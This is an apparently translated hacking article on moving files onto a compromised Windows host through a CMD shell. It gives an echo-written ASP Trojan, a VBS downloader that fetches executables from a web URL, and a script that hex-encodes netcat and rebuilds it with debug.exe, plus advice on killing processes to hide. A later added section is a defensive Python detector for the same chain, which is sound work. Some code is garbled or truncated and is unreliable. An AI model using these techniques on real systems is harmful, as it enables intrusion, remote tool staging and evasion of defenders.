Everything in the CMD Shell

Time: 2021-5-10

File transfer

For a CMD shell obtained through an overflow vulnerability, the biggest problem is how to upload files. Because of the prevalence of worms, ports 139 and 445, which are needed to connect to IPC$, are usually blocked. In addition, Windows XP strengthens the protection of IPC$, so uploading files through IPC$ and the default shares is basically no longer workable. FTP and TFTP are two feasible methods; since they are well known, this article will not introduce them. There are also three methods you may already be familiar with; to sum up, I will mention them again.

1. Write an ASP Trojan with the echo command.
The premise, of course, is that IIS is already installed on the target host.
A general ASP Trojan is "large" in volume and not suitable for writing directly with the echo command, so here I provide a compact one.
The echo version is given directly:

```bat
@echo ^ >up.asp
```

Note that this is a single line with no carriage return in the middle.
The generated up.asp cannot be accessed with a browser; only the following script can be used:

```bat
with wscript
if .arguments.count>dl.vbs
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs
```

For example, to download ps.exe and save it as C:\path\ps.exe:

```bat
cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
```

Note that this is done in the remote shell.

4. Write any file with echo in encoded form, then restore it with script + debug.
Neither of the previous methods can guarantee getting through the firewall. Besides, unless you set up your own web server, web resources are generally provided as compressed files; if the target host has no decompression tool, there is no way forward. So here is the "trump card".

The echo command can write characters whose ASCII code is less than 128, but not characters whose ASCII code is 128 or above. Only if the local file is re-encoded into displayable characters can it be written to the remote host conveniently. The first thing that comes to mind is Base64, the encoding used for email attachments. However, VBS does not support bit operations, so encoding and decoding become more complex. What's more, the script's ability to process files as binary streams is poor (Adodb.Stream can write files in stream mode, but I cannot construct the corresponding data type. A binary data stream can be converted to a string with the MidB function, but not vice versa. It took me two days to solve the problem. If anyone can use VBS or JS to write arbitrary byte data to a file, please give me your advice.)

So only debug.exe remains. Many people know the principle, so I will not introduce it and will give the result directly. The encoding script:

```vbscript
fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt>debug.vbs"+vbcrlf+"@echo +"""
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with
```

Save it as echo.vbs. Suppose you want to upload nc.exe; then enter the following on the local command line:

```bat
cscript echo.vbs nc.exe
```

You can also drag the icon of the file to be transferred onto the icon of the script file.
After a moment, an nc.exe.bat is generated in the current directory. Open it with Notepad or another editor and you will see the following:

```bat
@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"_>>debug.vbs
@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs
@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs
... (lines omitted)
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs
```

Select all -> Copy -> switch to the remote command-line window -> Paste.
If the network is not very slow, the whole upload takes about 20 seconds.

Some notes:
1. Transfers of large files are unstable and may cause the shell to die, so the smaller the file, the better. It is suggested that the original file not exceed 100 KB.
2. Before transferring a large file, you can transfer a small file first as a "warm-up" so that the 16-bit virtual machine ntvdm.exe stays resident in the background. After all files have been transferred, the ntvdm process should be killed for the sake of concealment.
3. In some CMD shells every command must be followed by two carriage returns, so nc.exe.bat cannot be used directly there.
4. The length of a single command is limited, so the whole job cannot be done with one echo. Moreover, in the CMD shell provided by NC, a slightly longer command makes the shell exit automatically (an overflow?). You can change the "i mod 128 = 0" statement to adjust the length of each echo command; the number of characters in each echo is that value multiplied by 2.
5. Decoding without a script is also possible. The purpose of using a script is to reduce the amount of data transferred (because the data is compressed). If I have time, I will write a better script with stronger data compression and a data verification function.
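From the defender's side, the procedure and the notes above leave a recognisable trail in process-creation command lines: long hex chunks echoed into a .vbs file (the first one starting with the MZ header 4D5A), cscript output piped into debug.exe, and the 16-bit ntvdm.exe appearing on a host. The following is an added detection example, not code from the original article; the command lines it scans are constructed to mirror the nc.exe.bat shown above, and the input format (one command line per string) is an assumption about your log source.

```python
"""Flag the echo + debug.exe reconstruction chain in process command lines.

Added example for this page; it is not part of the original article. The
sample command lines below are constructed (not captured from a real host);
feed in your own process-creation command lines, one string each.
"""
import re
from dataclasses import dataclass

# '@echo str="4D5A..."_>>debug.vbs' / '@echo +"5045..."_>>debug.vbs':
# hex text appended to a .vbs file one chunk at a time.
HEX_ECHO_RE = re.compile(
    r'echo\s+(?P<kind>str=|\+)"(?P<hex>[0-9A-Fa-f]{16,})"_?\s*>>\s*'
    r'(?P<target>[\w.\\:-]+\.vbs)', re.I)

# (reason, pattern) pairs; the first matching rule for a line wins.
RULES = [
    ("script output piped into debug.exe (in-shell binary reconstruction)",
     re.compile(r'cscript\b[^|]*\.vbs\s*\|\s*debug(?:\.exe)?\b', re.I)),
    ("debug.exe invoked from a shell",
     re.compile(r'(?:^|[\s"\\|&])debug\.exe(?:$|[\s">&|])', re.I)),
    ("16-bit NTVDM started (debug.exe runs inside ntvdm.exe)",
     re.compile(r'(?:^|[\s"\\])ntvdm\.exe(?:$|[\s"])', re.I)),
]

MZ_HEX = "4D5A"  # "MZ", the DOS/PE executable magic, as hex text


@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str
    command: str


def analyse(command_lines):
    """Return (findings, bytes_by_target).

    findings        : one Finding per suspicious command line
    bytes_by_target : decoded byte count of the hex text appended to each
                      .vbs, i.e. the approximate size of the smuggled file
    """
    findings = []
    bytes_by_target = {}
    for n, cmd in enumerate(command_lines, 1):
        m = HEX_ECHO_RE.search(cmd)
        if m:
            target = m["target"].lower()
            bytes_by_target[target] = bytes_by_target.get(target, 0) + len(m["hex"]) // 2
            # A fresh string that opens with the MZ magic is an executable being staged.
            if m["kind"] == "str=" and m["hex"].upper().startswith(MZ_HEX):
                findings.append(Finding(n, f"hex-encoded MZ header echoed into {target}", cmd))
            continue
        for reason, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(n, reason, cmd))
                break
    return findings, bytes_by_target


# Constructed sample: the shape of the generated .bat lines plus benign noise.
SAMPLE_COMMAND_LINES = [
    'cmd.exe /c @echo str="4D5A90000300000004000000FFFF0000B8000000"_>>debug.vbs',
    'cmd.exe /c @echo +"504500004C010400B98EAE3400000000"_>>debug.vbs',
    'cmd.exe /c @echo +"">>debug.vbs',
    'cmd.exe /c cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs',
    'C:\\Windows\\System32\\ntvdm.exe',
    'cmd.exe /c dir c:\\',
    'cscript //nologo inventory.vbs',
]


if __name__ == "__main__":
    found, sizes = analyse(SAMPLE_COMMAND_LINES)
    for f in found:
        print(f"line {f.line_no}: {f.reason}\n    {f.command}")
    for target, size in sizes.items():
        print(f"{size} bytes of hex text appended to {target}")
```

The byte tally per target is useful on its own: the notes say the files moved this way are small (under 100 KB), so a burst of echo lines accumulating tens of kilobytes into one .vbs, followed within seconds by a debug.exe launch, is the whole chain in order, while an isolated debug.exe start on a modern host is already worth a look because the tool has no routine use there.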

Uploading files is easy enough, of course, and many Windows tools are more convenient still. But as you go around looking for the tools you need, don't forget Windows itself.
